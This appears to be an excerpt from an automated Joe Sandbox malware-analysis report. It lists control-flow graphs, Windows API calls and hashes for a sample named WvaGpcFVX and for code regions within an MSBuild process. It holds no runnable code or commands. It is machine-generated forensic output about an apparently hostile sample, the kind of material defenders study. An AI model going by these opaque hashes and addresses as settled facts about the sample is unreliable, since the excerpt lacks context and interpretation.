                                                • Not Executed
                                                control_flow_graph 59 2bc590c-2bc590f 60 2bc5919-2bc59d9 CreateActCtxA 59->60 62 2bc59db-2bc59e1 60->62 63 2bc59e2-2bc5a3c 60->63 62->63 70 2bc5a3e-2bc5a41 63->70 71 2bc5a4b-2bc5a4f 63->71 70->71 72 2bc5a60-2bc5a76 71->72 73 2bc5a51-2bc5a5d 71->73 73->72
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02BC59C9
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: d5dda27fd6172d6cff5f7c0ecdc08f6029a52723bc151d7af35f0811bb86b38a
                                                • Instruction ID: 15afc6da57a4cd89b5156fff0c3216009add8a043442a0a3049f126c8d2d9b71
                                                • Opcode Fuzzy Hash: d5dda27fd6172d6cff5f7c0ecdc08f6029a52723bc151d7af35f0811bb86b38a
                                                • Instruction Fuzzy Hash: 8541CF70C00719CBDB24CFAAC884BCEBBB1BF49714F6080AAE508AB251DB756945CF91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 77 2bc44b0-2bc59d9 CreateActCtxA 80 2bc59db-2bc59e1 77->80 81 2bc59e2-2bc5a3c 77->81 80->81 88 2bc5a3e-2bc5a41 81->88 89 2bc5a4b-2bc5a4f 81->89 88->89 90 2bc5a60-2bc5a76 89->90 91 2bc5a51-2bc5a5d 89->91 91->90
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02BC59C9
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: f242d04b8d40c3b1a2422b9f01b1d0f7968e9a9e24449f6c0536a4bf1a95db81
                                                • Instruction ID: a10e9ac2fdf07bfdb45b5233e557e7799692caace734915a3206b875f1329ef3
                                                • Opcode Fuzzy Hash: f242d04b8d40c3b1a2422b9f01b1d0f7968e9a9e24449f6c0536a4bf1a95db81
                                                • Instruction Fuzzy Hash: 3941CE70C0071DCBDB24CFAAC884B8EBBB5FF48714F6080AAE508AB251DB756945CF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 95 5384040-538407c 96 538412c-538414c 95->96 97 5384082-5384087 95->97 103 538414f-538415c 96->103 98 5384089-53840c0 97->98 99 53840da-5384112 CallWindowProcW 97->99 106 53840c9-53840d8 98->106 107 53840c2-53840c8 98->107 100 538411b-538412a 99->100 101 5384114-538411a 99->101 100->103 101->100 106->103 107->106
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05384101
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2341562619.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5380000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: b133d5d13f850b197acd655ac35fb5ea0069f51610ab73edbff4f9dc1dc9e5f9
                                                • Instruction ID: c57a3d4a4bafb495d177c150366fe2006147e6aabf8e13aaf6ef256fefdfea8d
                                                • Opcode Fuzzy Hash: b133d5d13f850b197acd655ac35fb5ea0069f51610ab73edbff4f9dc1dc9e5f9
                                                • Instruction Fuzzy Hash: B9410BB8900309CFDB14DF99C448AAAFBF5FB88318F248459D519AB721D775A841CFA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 109 538a660-538a662 110 538a669-538a66a 109->110 111 538a664-538a668 109->111 112 538a66c-538a670 110->112 113 538a671-538a695 call 53898c4 110->113 111->110 112->113 116 538a6aa-538a73c CreateIconFromResourceEx 113->116 117 538a697-538a6a7 113->117 121 538a73e-538a744 116->121 122 538a745-538a762 116->122 121->122
                                                APIs
                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0538A72F
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2341562619.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5380000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: 8099f8f935c4d4031736953a8937dedffbb496e6ab98d7eae0b716fa7b80e097
                                                • Instruction ID: b465e36ff2ca6c076297c55840c840c71cc5e98c977724acdc87c7ca9e89567d
                                                • Opcode Fuzzy Hash: 8099f8f935c4d4031736953a8937dedffbb496e6ab98d7eae0b716fa7b80e097
                                                • Instruction Fuzzy Hash: FC318D719043899FCB119FA9C844AEABFF8EF49310F14805AE554A7262C375D854DBA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 125 2bcd2fc-2bcd7a4 DuplicateHandle 127 2bcd7ad-2bcd7ca 125->127 128 2bcd7a6-2bcd7ac 125->128 128->127
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02BCD6D6,?,?,?,?,?), ref: 02BCD797
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 966eca2c3cb59a59d8fc23809919b31535b73c0a7325889ec8f85e9ab522343a
                                                • Instruction ID: c2f9e82ffbf7ee4196002a17c4dd2e2930939e7626689738b03ccfa96114e3a3
                                                • Opcode Fuzzy Hash: 966eca2c3cb59a59d8fc23809919b31535b73c0a7325889ec8f85e9ab522343a
                                                • Instruction Fuzzy Hash: 6321E4B5900259DFDB10CF9AD984ADEFBF4EB48320F24846AE918A7350D374A950CFA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 131 2bcd708-2bcd70b 132 2bcd710-2bcd7a4 DuplicateHandle 131->132 133 2bcd7ad-2bcd7ca 132->133 134 2bcd7a6-2bcd7ac 132->134 134->133
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02BCD6D6,?,?,?,?,?), ref: 02BCD797
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 30651a3d1c522196548d195ef1972292d2102791c14299f56f90c9aaa56df640
                                                • Instruction ID: 718e3258d850a6f5928f19ec97983035c455db6b678ef575dca2e5d1d7a85350
                                                • Opcode Fuzzy Hash: 30651a3d1c522196548d195ef1972292d2102791c14299f56f90c9aaa56df640
                                                • Instruction Fuzzy Hash: 1C2116B5900219DFDB10CF9AD984ADEBBF4EB48320F24842AE918A3310C374A940CFA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 137 538a6c0-538a73c CreateIconFromResourceEx 138 538a73e-538a744 137->138 139 538a745-538a762 137->139 138->139
                                                APIs
                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0538A72F
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2341562619.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5380000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: 0648e692cfcdd4c66a6eb0dcfc32b656ea15f30f0a499d56d9c0ed62654a1305
                                                • Instruction ID: 13e33ba7cc3d4455851baddca8e016d58735e1c023a32f039e83772ad980d97f
                                                • Opcode Fuzzy Hash: 0648e692cfcdd4c66a6eb0dcfc32b656ea15f30f0a499d56d9c0ed62654a1305
                                                • Instruction Fuzzy Hash: DD1149B5800349DFDB10DF9AC844BDEBFF8EB48320F24841AE554A7210C375A950DFA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 142 2bcb018-2bcb058 143 2bcb05a-2bcb05d 142->143 144 2bcb060-2bcb08b GetModuleHandleW 142->144 143->144 145 2bcb08d-2bcb093 144->145 146 2bcb094-2bcb0a8 144->146 145->146
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02BCB07E
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: ccedc05c2cc39db371c66d698cb6566133a4ff916fee4098d20be6b48b859418
                                                • Instruction ID: 9721515567baa291919a5064c794114bca0ea8e95118209e39b846f0f0ad85cd
                                                • Opcode Fuzzy Hash: ccedc05c2cc39db371c66d698cb6566133a4ff916fee4098d20be6b48b859418
                                                • Instruction Fuzzy Hash: 7C1113B5C007498FDB10CF9AC444BDEFBF4EB88624F20845AD528A7210D379A545CFA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 148 82c06c0-82c0732 PostMessageW 150 82c073b-82c074f 148->150 151 82c0734-82c073a 148->151 151->150
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 082C0725
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2344459991.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_82c0000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: c2fe4c17a291b804bb0b1e28c25612438541110aeaec26c855d5ad5f87c1081b
                                                • Instruction ID: e5d3ab1ae5244cf55b82290ba3b6e39c62a2185e012c4dbbf8720af8acbb6f6a
                                                • Opcode Fuzzy Hash: c2fe4c17a291b804bb0b1e28c25612438541110aeaec26c855d5ad5f87c1081b
                                                • Instruction Fuzzy Hash: 1F1145B5800349DFDB10CF9AC884BDEFBF8EB48324F20841AE558A7200C374A544CFA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 153 82c06c8-82c0732 PostMessageW 154 82c073b-82c074f 153->154 155 82c0734-82c073a 153->155 155->154
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 082C0725
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2344459991.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_82c0000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 69a322bff06a8457f0c8a84deba88d2025fda54f8f9f28327ec1b433f784f552
                                                • Instruction ID: a6ffee6234126effa184bff73917fd36ef656487e35ccec3ad8a077dbfeab3c6
                                                • Opcode Fuzzy Hash: 69a322bff06a8457f0c8a84deba88d2025fda54f8f9f28327ec1b433f784f552
                                                • Instruction Fuzzy Hash: 5E1112B5800749DFDB10CF9AC984BDEFBF8EB48320F20841AE558A7200C379A944CFA1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338049823.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2b6d000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e1fe6444ae5098f5ad3be6601ec8bcd4aed48c9144c0662c7140475ccedabb7
                                                • Instruction ID: 442ade5bb441aa3f625c67f9416a37f37aa925e757b44836a912a121966b803e
                                                • Opcode Fuzzy Hash: 5e1fe6444ae5098f5ad3be6601ec8bcd4aed48c9144c0662c7140475ccedabb7
                                                • Instruction Fuzzy Hash: 4F212871600245DFDB08DF14D9C8F26BB65FB88314F28C5ADE9094B656C33AE856CBA1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338049823.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2b6d000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8a9e88be44ef0e06ae8e3493591d0771c329e6c3520d408dc0dd5c4ea5934a9b
                                                • Instruction ID: c7c978895569681258bc4047e460e29599849ee1b6fef39ecea1914705c0ce73
                                                • Opcode Fuzzy Hash: 8a9e88be44ef0e06ae8e3493591d0771c329e6c3520d408dc0dd5c4ea5934a9b
                                                • Instruction Fuzzy Hash: 9F210372600241DFDB05DF14D9C8B26BF65FB88318F24C5A9E9090B657C33AD456CAA1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338146952.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2b7d000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 329d4ee2af27c8bb5c058ed67d86b3328300a6fc356bc551bbc2e1988bf04bca
                                                • Instruction ID: a392d2c8bd49ec1a1c916d20e7109eec75235473b0f330a7073d2338e0941665
                                                • Opcode Fuzzy Hash: 329d4ee2af27c8bb5c058ed67d86b3328300a6fc356bc551bbc2e1988bf04bca
                                                • Instruction Fuzzy Hash: 08210471604205EFDB05DF14D9C0B26BBA5FF98314F24C6ADE99A4B292C336D447CA61
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338146952.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2b7d000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b30b7c81a0b659705423e39848f04a9ff175655115ce6a8d5a7ac5e897c5e256
                                                • Instruction ID: b6e6400c726cf6ad9777b4ebb9e25b777c5026492a806ea9fc102af6b877c0b4
                                                • Opcode Fuzzy Hash: b30b7c81a0b659705423e39848f04a9ff175655115ce6a8d5a7ac5e897c5e256
                                                • Instruction Fuzzy Hash: 35213171604201EFDB14DF24D9D0B26BBA1FF88314F20C6ADE80A4B292C33AD847CB61
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338146952.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2b7d000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22db724330d40d6f7381817210283c6cb9f226f9f15e78ed3b49f0df17cb410c
                                                • Instruction ID: 85df0f6f4ac752a73d615aad5a20f4ce460bd27a305fa3e360c1150615a3ced9
                                                • Opcode Fuzzy Hash: 22db724330d40d6f7381817210283c6cb9f226f9f15e78ed3b49f0df17cb410c
                                                • Instruction Fuzzy Hash: 3B216F755083849FCB12CF24D994B15BF71EF46214F28C5EAD8498F2A7C33A985ACB62
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338049823.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2b6d000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                • Instruction ID: c6770495efc9af8c52f7900f2fca5103ab9a434565c720d421014237a812da7d
                                                • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                • Instruction Fuzzy Hash: 8111D376504280CFCB15CF10D5C4B26BF71FB84318F24C6AAD8490B657C33AD456CBA1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338049823.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2b6d000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                • Instruction ID: a3ffb4e887946c4c8cc8665f8f8aace8759494910d8a347f6551f3f84259f7c2
                                                • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                • Instruction Fuzzy Hash: C811D376504245DFCB15CF10D5C4B26BF71FB84324F28C6A9D9094B656C33AE856CBA1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2338146952.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2b7d000_WvaGpcFVX.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                • Instruction ID: 1f993339d8aa07e8443e7e08aacf60c5af2a1558c4b225b580c7463f0afe942b
                                                • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                • Instruction Fuzzy Hash: A0118B75504284DFCB15CF10D5C4B15BBA1FF84218F28C6A9DC894B696C33AD44ACB61

                                                Execution Graph

                                                Execution Coverage:11.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:29
                                                Total number of Limit Nodes:1
                                                execution_graph 7011 5370d60 7012 5370d82 7011->7012 7013 5370e4e 7012->7013 7016 5377b8c 7012->7016 7020 53777a8 7012->7020 7019 5377a43 7016->7019 7017 5377cc9 LdrInitializeThunk 7018 5377ce1 7017->7018 7018->7013 7019->7017 7023 53777d9 7020->7023 7021 5377939 7021->7013 7022 5377cc9 LdrInitializeThunk 7022->7021 7023->7021 7023->7022 7162 537aeef 7163 537af00 7162->7163 7164 53777a8 LdrInitializeThunk 7163->7164 7165 537afec 7163->7165 7164->7165 7153 537c4a8 7154 537c489 7153->7154 7155 537c4b6 7153->7155 7156 53777a8 LdrInitializeThunk 7155->7156 7157 537c5a4 7155->7157 7156->7157 7060 5370d50 7061 5370d60 7060->7061 7062 5370e4e 7061->7062 7063 5377b8c LdrInitializeThunk 7061->7063 7064 53777a8 LdrInitializeThunk 7061->7064 7063->7062 7064->7062 7166 537f8c9 7167 537f8d8 7166->7167 7168 53777a8 LdrInitializeThunk 7167->7168 7169 537f9c4 7167->7169 7168->7169

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 989 53777a8-53777d7 990 53777de-5377874 989->990 991 53777d9 989->991 993 5377913-5377919 990->993 991->990 994 537791f-5377937 993->994 995 5377879-537788c 993->995 996 537794b-537795e 994->996 997 5377939-5377946 994->997 998 5377893-53778e4 995->998 999 537788e 995->999 1001 5377965-5377981 996->1001 1002 5377960 996->1002 1000 5377ce1-5377dde 997->1000 1015 53778f7-5377909 998->1015 1016 53778e6-53778f4 998->1016 999->998 1007 5377de6-5377df0 1000->1007 1008 5377de0-5377de5 1000->1008 1004 5377983 1001->1004 1005 5377988-53779ac 1001->1005 1002->1001 1004->1005 1011 53779b3-53779e5 1005->1011 1012 53779ae 1005->1012 1008->1007 1021 53779e7 1011->1021 1022 53779ec-5377a2e 1011->1022 1012->1011 1018 5377910 1015->1018 1019 537790b 1015->1019 1016->994 1018->993 1019->1018 1021->1022 1024 5377a35-5377a3e 1022->1024 1025 5377a30 1022->1025 1026 5377c66-5377c6c 1024->1026 1025->1024 1027 5377a43-5377a68 1026->1027 1028 5377c72-5377c85 1026->1028 1029 5377a6f-5377aa6 1027->1029 1030 5377a6a 1027->1030 1031 5377c87 1028->1031 1032 5377c8c-5377ca7 1028->1032 1040 5377aad-5377adf 1029->1040 1041 5377aa8 1029->1041 1030->1029 1031->1032 1033 5377cae-5377cc2 1032->1033 1034 5377ca9 1032->1034 1038 5377cc4 1033->1038 1039 5377cc9-5377cdf LdrInitializeThunk 1033->1039 1034->1033 1038->1039 1039->1000 1043 5377b43-5377b56 1040->1043 1044 5377ae1-5377b06 1040->1044 1041->1040 1045 5377b5d-5377b82 1043->1045 1046 5377b58 1043->1046 1047 5377b0d-5377b3b 1044->1047 1048 5377b08 1044->1048 1051 5377b84-5377b85 1045->1051 1052 5377b91-5377bc9 1045->1052 1046->1045 1047->1043 1048->1047 1051->1028 1053 5377bd0-5377c31 call 5377588 1052->1053 1054 5377bcb 1052->1054 1060 5377c33 1053->1060 1061 5377c38-5377c5c 1053->1061 1054->1053 1060->1061 1064 5377c63 1061->1064 1065 5377c5e 1061->1065 1064->1026 1065->1064
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.4705706975.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_5370000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9774d0c9b2bd1095a33ec131fe8c833c25a5ba1589c55653ac451f26ef7310cf
                                                • Instruction ID: 7685a5e8991c5a9c6fb18a165a85096d066578ea0ed62ed79454208c6a89fd50
                                                • Opcode Fuzzy Hash: 9774d0c9b2bd1095a33ec131fe8c833c25a5ba1589c55653ac451f26ef7310cf
                                                • Instruction Fuzzy Hash: 1CF1E374E01218DFDB24DFA9C884B9DBBB2FF88304F5481A9D848AB355DB749986CF50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1066 5377b8c 1067 5377c4b-5377c5c 1066->1067 1068 5377c63-5377c6c 1067->1068 1069 5377c5e 1067->1069 1071 5377a43-5377a68 1068->1071 1072 5377c72-5377c85 1068->1072 1069->1068 1073 5377a6f-5377aa6 1071->1073 1074 5377a6a 1071->1074 1075 5377c87 1072->1075 1076 5377c8c-5377ca7 1072->1076 1084 5377aad-5377adf 1073->1084 1085 5377aa8 1073->1085 1074->1073 1075->1076 1077 5377cae-5377cc2 1076->1077 1078 5377ca9 1076->1078 1082 5377cc4 1077->1082 1083 5377cc9-5377cdf LdrInitializeThunk 1077->1083 1078->1077 1082->1083 1086 5377ce1-5377dde 1083->1086 1091 5377b43-5377b56 1084->1091 1092 5377ae1-5377b06 1084->1092 1085->1084 1088 5377de6-5377df0 1086->1088 1089 5377de0-5377de5 1086->1089 1089->1088 1093 5377b5d-5377b82 1091->1093 1094 5377b58 1091->1094 1096 5377b0d-5377b3b 1092->1096 1097 5377b08 1092->1097 1100 5377b84-5377b85 1093->1100 1101 5377b91-5377bc9 1093->1101 1094->1093 1096->1091 1097->1096 1100->1072 1102 5377bd0-5377c31 call 5377588 1101->1102 1103 5377bcb 1101->1103 1109 5377c33 1102->1109 1110 5377c38-5377c4a 1102->1110 1103->1102 1109->1110 1110->1067
                                                APIs
                                                • LdrInitializeThunk.NTDLL(00000000), ref: 05377CCE
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.4705706975.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_5370000_MSBuild.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 42768a49eabe35f6e778ab0e11a9e6efdb64a998ae919c83d243222384eb9758
                                                • Instruction ID: 167c5521946f6cb114d7e312af73f401bf0e1606a2a1a9d2bcf969a61159f49b
                                                • Opcode Fuzzy Hash: 42768a49eabe35f6e778ab0e11a9e6efdb64a998ae919c83d243222384eb9758
                                                • Instruction Fuzzy Hash: D1113D74E0020A9FEB24DBA8D484EBDB7F5FB88304F148165E844E7345D7759941CB50
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.4699450279.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_f3d000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a609b6208e03fa756d2c69fbf884b37f09b391e47e159a25846cf4c946e9cf4
                                                • Instruction ID: 1e99a1c07542c104ab6e7fd05faad224d7db00c578a74bc2a69a8b5ba8ef2591
                                                • Opcode Fuzzy Hash: 4a609b6208e03fa756d2c69fbf884b37f09b391e47e159a25846cf4c946e9cf4
                                                • Instruction Fuzzy Hash: 7331307550E3C08FD707CB20D9A4715BF71AF47224F1985DBD889CF2A7C22A980ACB62
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.4699450279.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_f3d000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b0a3f540a516d061acc6d1f890b853f35a892992a53c2e4e011faed1e81be6d
                                                • Instruction ID: b17e07c88ce061759a0b5a18ebec260b548090e0818f6b682315c5fefd59964a
                                                • Opcode Fuzzy Hash: 4b0a3f540a516d061acc6d1f890b853f35a892992a53c2e4e011faed1e81be6d
                                                • Instruction Fuzzy Hash: 8D2137B1504204DFDB18DF20E9C0B16BB65FB84734F30C56DE8094B256C736D847EA61